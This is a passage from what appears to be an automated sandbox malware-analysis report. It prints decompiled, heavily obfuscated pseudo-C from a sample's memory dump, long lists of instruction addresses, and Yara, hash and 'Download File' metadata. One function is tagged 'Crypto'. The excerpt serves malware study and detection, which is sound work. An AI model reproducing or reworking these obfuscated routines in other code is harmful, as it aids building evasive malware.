										__edx = __edx &  *0x61fd7773;
										_pop( *0x77939415);
										__eax = 0xffffffff86f3a2df |  *0xc29ac2fd;
										 *0xa711e0c0 =  *0xa711e0c0 + __esp;
										__bh = __bh + 0xe6;
										if(__bh < 0) {
											goto L1;
										} else {
											__esp = __esp - 1;
											__edx = __edx &  *0xc378bdcc;
											__eax = __eax - 1;
											__ecx = 0xadcfcd07;
											asm("adc eax, [0x8586fbbc]");
											 *0xb2c30423 =  *0xb2c30423 - __ebx;
											asm("sbb [0x6bfd1691], ecx");
											__edx = __edx ^  *0xb35aa823;
											 *0x743fd666 = 0x3575ca3e;
											__ebx = __ebx ^ 0xa9281068;
											__eax = __eax + 1;
											__ebp = 0x9e7b10a1;
											 *0x75d09d7 =  *0x75d09d7 << 0xd1;
											asm("ror byte [0xdbdb1508], 0xe");
											asm("sbb [0xa7c02bb5], ah");
											__cl = 0x1d1;
											__ebx = __ebx |  *0x40ca42b9;
											__esp = __esp - 1;
											 *0x5654a4db =  *0x5654a4db & 0xadcfcd07;
											__esp = __esp - 1;
											 *0xc378bdcc =  *0xc378bdcc >> 0xed;
											__esp = __esp | 0x959d9111;
											asm("sbb [0x8d89ba20], dl");
											__esi =  *0xebfa06b * 0xf219;
											_push( *0x684ca7c7);
											__ebx = __ebx + 1;
											 *0x48d055f2 =  *0x48d055f2 | __dh;
											__esp = __esp + 0xabd297bd;
											__ebx = 0x13080f36;
											asm("ror byte [0xb79f1886], 0x6c");
											__edx = __edx - 1;
											asm("cmpsw");
											__esi =  *0xebfa06b * 0xf219 - 1;
											 *0x608156b0 =  *0x608156b0 - __dl;
											__ebx = 0xffffffffa42c93c9;
											__esp =  *0x1afee91d;
											__edi = __edi &  *0x8dbe7311;
											 *0x67c06df6 =  *0x67c06df6 & __bl;
											 *0x13c18cdb = __edi;
											__ebp = __esp;
											asm("sbb eax, 0x3575ca3e");
											__esp =  *0x1afee91d &  *0x1e5d0c68;
											__esi =  *0xebfa06b * 0xf219;
											 *0x9b31508e =  *0x9b31508e ^ __esi;
											__eax = __eax + 1;
											__eax = __eax |  *0x76b5ca61;
											 *0x66c56e14 =  *0x66c56e14 + __bl;
											__ch = __ch |  *0xd2c22fa0;
											asm("movsw");
											asm("stosb");
											 *0xe9fb51a =  *0xe9fb51a << 0x22;
											_pop(__ecx);
											__ebp = 0xe6b0021;
											__eax = __eax - 0x970e1316;
											__edx = __edx +  *0xfd7773d4;
											__ebx = 0x5a7a52a;
											__ch = __ch +  *0x2f52a92a;
											__dh = __dh -  *0x27bb1d32;
											if(0x72edcc05 !=  *0xca3e6f62) {
												goto L1;
											} else {
												asm("ror dword [0xf683575], 0x37");
												asm("adc [0x56c90420], bh");
												__ecx = 0xadcfcd07 -  *0xde3fbaeb;
												_t61 = __esi;
												__esi =  *0xe75e826f;
												 *0xe75e826f = _t61;
												_pop(__ebx);
												asm("rol dword [0x22181492], 0x46");
												asm("stosd");
												asm("ror byte [0xdcc5bce5], 0x40");
												 *0x39950d3 =  *0x39950d3 + __esp;
												_pop(__ebx);
												_push(0x9214341e);
												if( *0x39950d3 != 0) {
													goto L1;
												} else {
													asm("adc [0x9fb51a7b], eax");
													 *0xc2f9b410 =  *0xc2f9b410 ^ __dh;
													_t62 = __esi;
													__esi =  *0x663fba2f;
													 *0x663fba2f = _t62;
													__ecx = __ecx - 1;
													_pop(__eax);
													__edi = __edi &  *0x17080f36;
													 *0x380d70b3 =  *0x380d70b3 | __bh;
													 *0x6e057da8 =  *0x6e057da8 << 0x3d;
													__ebx =  *0xb4f306ef;
													 *0xb4f306ef = 0x5a7a52a;
													__dl = __dl | 0x00000063;
													 *0x36447e19 =  *0x36447e19 << 0x1d;
													asm("adc ebp, [0x460cc91f]");
													if( *0x36447e19 != 0) {
														goto L1;
														do {
															do {
																do {
																	do {
																		do {
																			goto L1;
																		} while ((_t65 & 0x0000000a) >= 0);
																		asm("scasb");
																		_t82 =  *0x8a5d6305;
																		asm("cmpsb");
																		_push( *0xafe8b8c4);
																		_t66 = _t65 |  *0x57bf634;
																		asm("rcr byte [0x82141b7], 0x16");
																		_push(_t87);
																		asm("rcl dword [0x21ac910d], 0xe5");
																		asm("sbb ch, [0xa3a45ad7]");
																		asm("sbb [0xa61356b1], bh");
																		_push(_t66);
																		_push(_t82 + 0xba0876cf);
																		_push( *0x32e74801);
																		_t9 = _t87;
																		_t87 =  *0x57856a35;
																		 *0x57856a35 = _t9;
																		asm("rol byte [0x8111ecb6], 0x92");
																		 *0x550a0908 =  *0x550a0908 ^ _t66;
																		_t81 =  *0xba69866a * 0xff7d;
																		_push(_t72);
																		_t67 = _t66 & 0x00000008;
																		 *0xb6e71d0a = _t72;
																		asm("rol byte [0x1761d412], 0x56");
																		 *0xf083184 = _t67;
																		asm("sbb esp, [0xdb89a2fb]");
																		asm("cmpsw");
																		asm("ror dword [0xe115810f], 0x13");
																		 *0x740acff9 =  *0x740acff9 >> 0xe7;
																		_t98 = ( *0x8e77569 * 0x0000da0a |  *0x3491b383) -  *0x830117eb;
																		 *0x3b2bb32b =  *0x3b2bb32b - _t87;
																		_t72 =  *0x364b2e6a * 0xb469;
																		_t65 =  *0x1f7901fa;
																		 *0x1f7901fa = _t67 - 1;
																		 *0xd2bff8cf =  *0xd2bff8cf << 0;
																		_t101 = (0xffffffff93ef5717 +  *0x3080086d |  *0xe34b4d3b) - 0x9ceffbdf;
																		 *0xe88f63f7 =  *0xe88f63f7 ^ 0x90f9ad25;
																	} while ( *0xe88f63f7 == 0);
																	asm("adc [0x9c51b074], ecx");
																	 *0xae61426 = _t81;
																	asm("movsb");
																	 *0xdd145d4 =  *0xdd145d4 - _t87;
																	asm("adc esi, [0x8ff90139]");
																	_t87 = _t87 + 2;
																	 *0xb454e0e0 =  *0xb454e0e0 - _t80;
																	asm("adc [0xa41e48bb], esi");
																	_pop(_t81);
																	 *0x493bdb32 =  *0x493bdb32 >> 0x39;
																	L1();
																	asm("ror dword [0xb221b2e8], 0xc5");
																	_t65 = _t65 & 0x0000001c;
																	asm("adc ebp, [0x7ac35861]");
																	 *0xf7154f3b =  *0xf7154f3b - 0x90f9ad25;
																	_t76 = _t76 + 1;
																	 *0xa24e3c15 =  *0xa24e3c15 - _t80;
																	 *0x3be3279f =  *0x3be3279f & _t72;
																	asm("sbb [0x9042f2c2], ebx");
																} while ( *0x3be3279f > 0);
																 *0x2babc577 =  *0x2babc577 - _t98;
																_t80 = _t80 +  *0x424a9db9;
																_t81 = _t81 + 0x30926d8e;
																 *0xce31028 =  *0xce31028 >> 0xf3;
																 *0xf0c0aff9 =  *0xf0c0aff9 - _t65;
																_t76 =  *0x7c91f760 * 0xaee;
																_push( *0xdc88d5bb);
																_t72 = _t72 & 0x00000063 ^  *0x9808efbb;
																_t87 = _t87 - 1;
																 *0xef44fb8f =  *0xef44fb8f + _t76;
																_pop( *0x6b431bd4);
																 *0xd3664a3b =  *0xd3664a3b + _t72;
																_t65 = _t65 ^  *0x98aa13f9;
															} while (_t65 != 0);
															asm("sbb ebx, [0xd521607a]");
															 *0xfc4edb89 =  *0xfc4edb89 >> 0xfa;
															asm("rcr dword [0xa6216009], 0x1c");
															_t78 = _t76 - 1;
															 *0xf40b53c0 = _t78;
															_t76 = _t78 ^  *0x86c89b15;
															_t101 = _t81;
															_push(_t65);
															asm("adc ebx, 0xb9213b81");
															_t72 = _t72 + 1;
															 *0xc5516339 =  *0xc5516339 - _t65;
														} while ( *0xc5516339 == 0);
														asm("adc esp, 0xe90ea674");
														 *0xdc9265ee =  *0x1175f627;
														 *0x6bba0e61 = _t65;
														asm("adc edi, [0x9584be31]");
														_pop(_t70);
														asm("movsb");
														return _t70;
													} else {
														__esi = __esi | 0x8773297b;
														 *0x4c6bbc1a =  *0x4c6bbc1a & __dl;
														return __eax;
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
			}

















                                                                                                                                                    0x0041bc66
                                                                                                                                                    0x0041bc66
                                                                                                                                                    0x0041bc71
                                                                                                                                                    0x0041bc76
                                                                                                                                                    0x0041bc7d
                                                                                                                                                    0x0041bc83
                                                                                                                                                    0x0041bc89
                                                                                                                                                    0x0041bc8f
                                                                                                                                                    0x0041bc95
                                                                                                                                                    0x0041bc9b
                                                                                                                                                    0x0041bca2
                                                                                                                                                    0x0041bca8
                                                                                                                                                    0x0041bcc0
                                                                                                                                                    0x0041bcc5
                                                                                                                                                    0x0041bccb
                                                                                                                                                    0x0041bcd5
                                                                                                                                                    0x0041bcd7
                                                                                                                                                    0x0041bce3
                                                                                                                                                    0x0041bce4
                                                                                                                                                    0x0041bce5
                                                                                                                                                    0x0041bcec
                                                                                                                                                    0x0041bcf2
                                                                                                                                                    0x0041bcf9
                                                                                                                                                    0x0041bd00
                                                                                                                                                    0x0041b4a6
                                                                                                                                                    0x0041b4a6
                                                                                                                                                    0x0041b4ad
                                                                                                                                                    0x0041b4b6
                                                                                                                                                    0x0041bd06
                                                                                                                                                    0x0041bd06
                                                                                                                                                    0x0041bd10
                                                                                                                                                    0x0041bd16
                                                                                                                                                    0x0041bd1c
                                                                                                                                                    0x0041bd1d
                                                                                                                                                    0x0041bd23
                                                                                                                                                    0x0041bd2a
                                                                                                                                                    0x0041bd36
                                                                                                                                                    0x0041bd42
                                                                                                                                                    0x0041bd4e
                                                                                                                                                    0x0041bd55
                                                                                                                                                    0x0041bd57
                                                                                                                                                    0x0041bd58
                                                                                                                                                    0x0041bd5f
                                                                                                                                                    0x0041bd5f
                                                                                                                                                    0x0041bd5f
                                                                                                                                                    0x0041bd65
                                                                                                                                                    0x0041bd6b
                                                                                                                                                    0x0041bd70
                                                                                                                                                    0x0041bd76
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0041bd7c
                                                                                                                                                    0x0041bd7c
                                                                                                                                                    0x0041bd86
                                                                                                                                                    0x0041bd8c
                                                                                                                                                    0x0041bd8d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0041bd93
                                                                                                                                                    0x0041bd93
                                                                                                                                                    0x0041bd99
                                                                                                                                                    0x0041bd9a
                                                                                                                                                    0x0041bd9d
                                                                                                                                                    0x0041bda4
                                                                                                                                                    0x0041bdb0
                                                                                                                                                    0x0041bdb3
                                                                                                                                                    0x0041bdb5
                                                                                                                                                    0x0041bdba
                                                                                                                                                    0x0041bdbb
                                                                                                                                                    0x0041bdc1
                                                                                                                                                    0x0041bdc7
                                                                                                                                                    0x0041bdcd
                                                                                                                                                    0x0041bdd0
                                                                                                                                                    0x0041bdd6
                                                                                                                                                    0x0041bdd7
                                                                                                                                                    0x0041bddd
                                                                                                                                                    0x0041bde3
                                                                                                                                                    0x0041bde3
                                                                                                                                                    0x0041bde3
                                                                                                                                                    0x0041bdea
                                                                                                                                                    0x0041bdf1
                                                                                                                                                    0x0041bdf2
                                                                                                                                                    0x0041bdf8
                                                                                                                                                    0x0041bdff
                                                                                                                                                    0x0041be05
                                                                                                                                                    0x0041be0b
                                                                                                                                                    0x0041be11
                                                                                                                                                    0x0041be1d
                                                                                                                                                    0x0041be23
                                                                                                                                                    0x0041be29
                                                                                                                                                    0x0041be2a
                                                                                                                                                    0x0041be31
                                                                                                                                                    0x0041be32
                                                                                                                                                    0x0041be35
                                                                                                                                                    0x0041be3b
                                                                                                                                                    0x0041be41
                                                                                                                                                    0x0041be48
                                                                                                                                                    0x0041be49
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0041be4f
                                                                                                                                                    0x0041be4f
                                                                                                                                                    0x0041be55
                                                                                                                                                    0x0041be56
                                                                                                                                                    0x0041be5d
                                                                                                                                                    0x0041be63
                                                                                                                                                    0x0041be69
                                                                                                                                                    0x0041be6a
                                                                                                                                                    0x0041be70
                                                                                                                                                    0x0041be72
                                                                                                                                                    0x0041be73
                                                                                                                                                    0x0041be79
                                                                                                                                                    0x0041be85
                                                                                                                                                    0x0041be86
                                                                                                                                                    0x0041be8c
                                                                                                                                                    0x0041be8f
                                                                                                                                                    0x0041be96
                                                                                                                                                    0x0041be9c
                                                                                                                                                    0x0041bea2
                                                                                                                                                    0x0041bea8
                                                                                                                                                    0x0041bea9
                                                                                                                                                    0x0041beb0
                                                                                                                                                    0x0041bec3
                                                                                                                                                    0x0041bec9
                                                                                                                                                    0x0041beca
                                                                                                                                                    0x0041bed0
                                                                                                                                                    0x0041bed6
                                                                                                                                                    0x0041bed7
                                                                                                                                                    0x0041bedf
                                                                                                                                                    0x0041bee5
                                                                                                                                                    0x0041bee7
                                                                                                                                                    0x0041bee7
                                                                                                                                                    0x0041beee
                                                                                                                                                    0x0041bef4
                                                                                                                                                    0x0041befb
                                                                                                                                                    0x0041bf01
                                                                                                                                                    0x0041bf07
                                                                                                                                                    0x0041bf0d
                                                                                                                                                    0x0041bf10
                                                                                                                                                    0x0041bf16
                                                                                                                                                    0x0041bf1c
                                                                                                                                                    0x0041bf1d
                                                                                                                                                    0x0041bf26
                                                                                                                                                    0x0041bf32
                                                                                                                                                    0x0041bf38
                                                                                                                                                    0x0041bf39
                                                                                                                                                    0x0041bf3a
                                                                                                                                                    0x0041bf41
                                                                                                                                                    0x0041bf48
                                                                                                                                                    0x0041bf4e
                                                                                                                                                    0x0041bf54
                                                                                                                                                    0x0041bf55
                                                                                                                                                    0x0041bf5a
                                                                                                                                                    0x0041bf5a
                                                                                                                                                    0x0041bf5a
                                                                                                                                                    0x0041bf60
                                                                                                                                                    0x0041bf63
                                                                                                                                                    0x0041bf69
                                                                                                                                                    0x0041bf6f
                                                                                                                                                    0x0041bf70
                                                                                                                                                    0x0041bf77
                                                                                                                                                    0x0041bf7d
                                                                                                                                                    0x0041bf84
                                                                                                                                                    0x0041bf86
                                                                                                                                                    0x0041bf8c
                                                                                                                                                    0x0041bf8d
                                                                                                                                                    0x0041bf94
                                                                                                                                                    0x0041bf9a
                                                                                                                                                    0x0041bfa0
                                                                                                                                                    0x0041bfa7
                                                                                                                                                    0x0041bfac
                                                                                                                                                    0x0041bfad
                                                                                                                                                    0x0041bfb3
                                                                                                                                                    0x0041bfb9
                                                                                                                                                    0x0041bfbf
                                                                                                                                                    0x0041bfc6
                                                                                                                                                    0x0041bfc9
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0041bfcf
                                                                                                                                                    0x0041bfcf
                                                                                                                                                    0x0041bfd6
                                                                                                                                                    0x0041bfdc
                                                                                                                                                    0x0041bfe3
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0041bfe9
                                                                                                                                                    0x0041bfe9
                                                                                                                                                    0x0041bfef
                                                                                                                                                    0x0041bff5
                                                                                                                                                    0x0041bffb
                                                                                                                                                    0x0041c001
                                                                                                                                                    0x0041c004
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0041c00a
                                                                                                                                                    0x0041c00f
                                                                                                                                                    0x0041c010
                                                                                                                                                    0x0041c01c
                                                                                                                                                    0x0041c01d
                                                                                                                                                    0x0041c023
                                                                                                                                                    0x0041c029
                                                                                                                                                    0x0041c03b
                                                                                                                                                    0x0041c041
                                                                                                                                                    0x0041c04d
                                                                                                                                                    0x0041c052
                                                                                                                                                    0x0041c058
                                                                                                                                                    0x0041c05f
                                                                                                                                                    0x0041c065
                                                                                                                                                    0x0041c06c
                                                                                                                                                    0x0041c073
                                                                                                                                                    0x0041c079
                                                                                                                                                    0x0041c07c
                                                                                                                                                    0x0041c082
                                                                                                                                                    0x0041c083
                                                                                                                                                    0x0041c089
                                                                                                                                                    0x0041c08a
                                                                                                                                                    0x0041c091
                                                                                                                                                    0x0041c097
                                                                                                                                                    0x0041c09d
                                                                                                                                                    0x0041c0a7
                                                                                                                                                    0x0041c0b3
                                                                                                                                                    0x0041c0b4
                                                                                                                                                    0x0041c0bb
                                                                                                                                                    0x0041c0c1
                                                                                                                                                    0x0041c0c6
                                                                                                                                                    0x0041c0cd
                                                                                                                                                    0x0041c0ce
                                                                                                                                                    0x0041c0d0
                                                                                                                                                    0x0041c0d1
                                                                                                                                                    0x0041c0d7
                                                                                                                                                    0x0041c0dd
                                                                                                                                                    0x0041c0e3
                                                                                                                                                    0x0041c0e9
                                                                                                                                                    0x0041c0ef
                                                                                                                                                    0x0041c0f5
                                                                                                                                                    0x0041c0f6
                                                                                                                                                    0x0041c0fb
                                                                                                                                                    0x0041c101
                                                                                                                                                    0x0041c102
                                                                                                                                                    0x0041c108
                                                                                                                                                    0x0041c109
                                                                                                                                                    0x0041c10f
                                                                                                                                                    0x0041c115
                                                                                                                                                    0x0041c121
                                                                                                                                                    0x0041c123
                                                                                                                                                    0x0041c12a
                                                                                                                                                    0x0041c131
                                                                                                                                                    0x0041c132
                                                                                                                                                    0x0041c138
                                                                                                                                                    0x0041c13d
                                                                                                                                                    0x0041c143
                                                                                                                                                    0x0041c149
                                                                                                                                                    0x0041c14f
                                                                                                                                                    0x0041c15b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0041c161
                                                                                                                                                    0x0041c161
                                                                                                                                                    0x0041c168
                                                                                                                                                    0x0041c16e
                                                                                                                                                    0x0041c174
                                                                                                                                                    0x0041c174
                                                                                                                                                    0x0041c174
                                                                                                                                                    0x0041c17a
                                                                                                                                                    0x0041c17e
                                                                                                                                                    0x0041c185
                                                                                                                                                    0x0041c186
                                                                                                                                                    0x0041c18d
                                                                                                                                                    0x0041c193
                                                                                                                                                    0x0041c194
                                                                                                                                                    0x0041c199
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0041c19f
                                                                                                                                                    0x0041c19f
                                                                                                                                                    0x0041c1a5
                                                                                                                                                    0x0041c1ab
                                                                                                                                                    0x0041c1ab
                                                                                                                                                    0x0041c1ab
                                                                                                                                                    0x0041c1b1
                                                                                                                                                    0x0041c1b2
                                                                                                                                                    0x0041c1b9
                                                                                                                                                    0x0041c1bf
                                                                                                                                                    0x0041c1c5
                                                                                                                                                    0x0041c1d2
                                                                                                                                                    0x0041c1d2
                                                                                                                                                    0x0041c1d8
                                                                                                                                                    0x0041c1db
                                                                                                                                                    0x0041c1e2
                                                                                                                                                    0x0041c1e8
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0041b4a6
                                                                                                                                                    0x0041b4a6
                                                                                                                                                    0x0041b4a6
                                                                                                                                                    0x0041b4a6
                                                                                                                                                    0x0041b4a6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0041b4d8
                                                                                                                                                    0x0041b4d9
                                                                                                                                                    0x0041b4da
                                                                                                                                                    0x0041b4e2
                                                                                                                                                    0x0041b4e8
                                                                                                                                                    0x0041b4ee
                                                                                                                                                    0x0041b4f5
                                                                                                                                                    0x0041b4f6
                                                                                                                                                    0x0041b503
                                                                                                                                                    0x0041b509
                                                                                                                                                    0x0041b515
                                                                                                                                                    0x0041b517
                                                                                                                                                    0x0041b534
                                                                                                                                                    0x0041b544
                                                                                                                                                    0x0041b544
                                                                                                                                                    0x0041b544
                                                                                                                                                    0x0041b54a
                                                                                                                                                    0x0041b551
                                                                                                                                                    0x0041b557
                                                                                                                                                    0x0041b561
                                                                                                                                                    0x0041b57a
                                                                                                                                                    0x0041b57d
                                                                                                                                                    0x0041b583
                                                                                                                                                    0x0041b58a
                                                                                                                                                    0x0041b58f
                                                                                                                                                    0x0041b595
                                                                                                                                                    0x0041b5aa
                                                                                                                                                    0x0041b5b1
                                                                                                                                                    0x0041b5b8
                                                                                                                                                    0x0041b5c3
                                                                                                                                                    0x0041b5c9
                                                                                                                                                    0x0041b5d3
                                                                                                                                                    0x0041b5d3
                                                                                                                                                    0x0041b5df
                                                                                                                                                    0x0041b5e6
                                                                                                                                                    0x0041b5ec
                                                                                                                                                    0x0041b5ec
                                                                                                                                                    0x0041b5f8
                                                                                                                                                    0x0041b5fe
                                                                                                                                                    0x0041b604
                                                                                                                                                    0x0041b605
                                                                                                                                                    0x0041b612
                                                                                                                                                    0x0041b618
                                                                                                                                                    0x0041b619
                                                                                                                                                    0x0041b61f
                                                                                                                                                    0x0041b625
                                                                                                                                                    0x0041b626
                                                                                                                                                    0x0041b62d
                                                                                                                                                    0x0041b632
                                                                                                                                                    0x0041b639
                                                                                                                                                    0x0041b63b
                                                                                                                                                    0x0041b641
                                                                                                                                                    0x0041b64d
                                                                                                                                                    0x0041b64e
                                                                                                                                                    0x0041b654
                                                                                                                                                    0x0041b65a
                                                                                                                                                    0x0041b65a
                                                                                                                                                    0x0041b666
                                                                                                                                                    0x0041b66c
                                                                                                                                                    0x0041b678
                                                                                                                                                    0x0041b67e
                                                                                                                                                    0x0041b68b
                                                                                                                                                    0x0041b694
                                                                                                                                                    0x0041b69e
                                                                                                                                                    0x0041b6a4
                                                                                                                                                    0x0041b6aa
                                                                                                                                                    0x0041b6ab
                                                                                                                                                    0x0041b6b7
                                                                                                                                                    0x0041b6bd
                                                                                                                                                    0x0041b6c9
                                                                                                                                                    0x0041b6c9
                                                                                                                                                    0x0041b6d5
                                                                                                                                                    0x0041b6e1
                                                                                                                                                    0x0041b6ee
                                                                                                                                                    0x0041b6f5
                                                                                                                                                    0x0041b6f6
                                                                                                                                                    0x0041b6fc
                                                                                                                                                    0x0041b703
                                                                                                                                                    0x0041b704
                                                                                                                                                    0x0041b70b
                                                                                                                                                    0x0041b711
                                                                                                                                                    0x0041b712
                                                                                                                                                    0x0041b712
                                                                                                                                                    0x0041b71e
                                                                                                                                                    0x0041b730
                                                                                                                                                    0x0041b736
                                                                                                                                                    0x0041b73c
                                                                                                                                                    0x0041b74f
                                                                                                                                                    0x0041b750
                                                                                                                                                    0x0041b75b
                                                                                                                                                    0x0041c1ee
                                                                                                                                                    0x0041c1ee
                                                                                                                                                    0x0041c1f4
                                                                                                                                                    0x0041c1fa
                                                                                                                                                    0x0041c1fa
                                                                                                                                                    0x0041c1e8
                                                                                                                                                    0x0041c199
                                                                                                                                                    0x0041c15b
                                                                                                                                                    0x0041c004
                                                                                                                                                    0x0041bfe3
                                                                                                                                                    0x0041bfc9
                                                                                                                                                    0x0041be49
                                                                                                                                                    0x0041bd8d
                                                                                                                                                    0x0041bd76

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 8f1dfa026839a85ee848b52c53afd1d3c9e370312d4f8838014311ae566cde00
                                                                                                                                                    • Instruction ID: 4c86ab84bd6a2ce2a613a756dd238283c47268a9d94ccdad25f6eaceef0391fa
                                                                                                                                                    • Opcode Fuzzy Hash: 8f1dfa026839a85ee848b52c53afd1d3c9e370312d4f8838014311ae566cde00
                                                                                                                                                    • Instruction Fuzzy Hash: 5D12BA329193C5CFE702CF38D89AB413FB5F782324B08429ED9A157592D3392565CF89
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00D12622, Relevance: .4, Instructions: 398COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 06b2a0219aac505955146f858a412552290681324c3b737acff4ea3183861260
                                                                                                                                                    • Instruction ID: 182e66970add5e472f31d5d4a1e0cc79da347a64138383ee9f35a0b6637490fd
                                                                                                                                                    • Opcode Fuzzy Hash: 06b2a0219aac505955146f858a412552290681324c3b737acff4ea3183861260
                                                                                                                                                    • Instruction Fuzzy Hash: BCE1D434214651AFC728CF19E4906F2B7E1AF15310F18845EE8D68B692DB36E8E5EB70
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00C7C7BC, Relevance: .3, Instructions: 333COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 5158a03672b841691510ba6655eaddf58cef7f21ea1a6f74d8ad77fb22e213a8
                                                                                                                                                    • Instruction ID: b6f99fc28c2bdf5f9b73f5f1d76c5de30be0c808bc75306c091eff0a3b8e4528
                                                                                                                                                    • Opcode Fuzzy Hash: 5158a03672b841691510ba6655eaddf58cef7f21ea1a6f74d8ad77fb22e213a8
                                                                                                                                                    • Instruction Fuzzy Hash: 83C11470500256EBDB24CF65C884FBABBF4FF16304F14846DE9978B681D774A941EBA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0041B973, Relevance: .3, Instructions: 293COMMONCrypto
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 47%
                                                                                                                                                    			E0041B973(signed int __eax, signed int __ebx, void* __ecx, void* __edx, signed int __esi) {
				signed char _t50;
				signed char _t51;
				signed char _t52;
				void* _t55;
				signed int _t60;
				signed int _t67;
				signed int _t69;
				void* _t72;
				signed int _t73;
				void* _t74;
				signed int _t78;
				signed int _t80;
				void* _t91;
				signed int _t94;
				signed int _t95;

				_t78 = __esi;
				_push(_t94);
				_push(0xeaca12a9);
				_push(__esi);
				asm("sbb edx, 0x980b43cb");
				 *0x90a56105 =  *0x90a56105 << 0xbf;
				 *0x55055615 = _t80 &  *0xe8886ce9;
				asm("cmpsw");
				 *0x2abfd78d =  *0x2abfd78d << 0x50;
				_push(__esi);
				_push( *0xe55c1505);
				_pop(_t73);
				_t72 = __edx - 0xe1;
				asm("sbb esp, 0x5624b5de");
				asm("rol dword [0x500fd603], 0xc9");
				asm("rol byte [0x56ed7404], 0xc0");
				_push(__ecx);
				asm("sbb al, [0xaed2040c]");
				asm("rol byte [0xaff1040c], 0x3");
				asm("rcl byte [0xdf16050c], 0x5f");
				 *0x556209a =  *0x556209a & _t94;
				_push(__esi);
				 *0x562ac117 =  *0x562ac117 >> 0x53;
				 *0x62075628 =  *0x62075628 + __ecx - 1;
				asm("rcl dword [0x16c0035], 0x9a");
				_t95 = _t94 |  *0xb4074111;
				 *0x6df37307 =  *0x6df37307 | __esi;
				asm("sbb [0x410d0295], ecx");
				asm("sbb esi, [0xdd7ade07]");
				_t60 = ((__ebx ^  *0xb4e8040c) - 0x00000001 |  *0xc0ddbf05) + 0xf2;
				asm("cmpsw");
				 *0x4cbc5fc5 =  *0x4cbc5fc5 ^ __eax;
				asm("adc ebp, [0x87b2e21]");
				_t50 = __eax | 0x00000088;
				_pop(_t67);
				asm("sbb ch, [0xffeb4002]");
				_push( *0x2a087b29);
				_push(_t50);
				asm("sbb [0x2020558b], edi");
				if(_t60 == 0xf9) {
					__esp = __esp |  *0xab95097b;
					asm("sbb ecx, [0xcde41191]");
					__esp = __esp |  *0x953b5de;
					 *0x72f5ce65 =  *0x72f5ce65 | __edx;
					__esi =  *0x53bdddd9;
					__eflags = __edx -  *0x2c834209;
					 *0xc0c54984 =  *0xc0c54984 >> 0x4b;
					asm("scasb");
					__bl = __bl +  *0x1591e40a;
					__eax = __ebx;
					__ebx = 0xc5caaf0b;
					__esi =  *0x53bdddd9 + 1;
					 *0xcaad0b08 =  *0xcaad0b08 << 0xf4;
					__ebx = __edx;
					__eflags =  *0x74816a9b & __eax;
					_t35 = __eax;
					__eax =  *0xa6b9876e;
					 *0xa6b9876e = _t35;
					 *0x97e7fc08 = __dh;
					 *0x28fdef1f =  *0x28fdef1f >> 0xa2;
					if(__eflags == 0) {
						__ebp = __ebp &  *0x4d1c117b;
						 *0x651c7d28 =  *0x651c7d28 >> 0x58;
						 *0xb38b7ff8 & __edx =  *0x8cc02d26 & __esp;
						__ebp = __ebp - 1;
						__eflags =  *0x8414683d & __eax;
						__bl = __bl ^ 0x000000e5;
						asm("sbb eax, 0x4c73b48b");
						_push(__edi);
						__eax = __eax + 1;
						asm("lodsb");
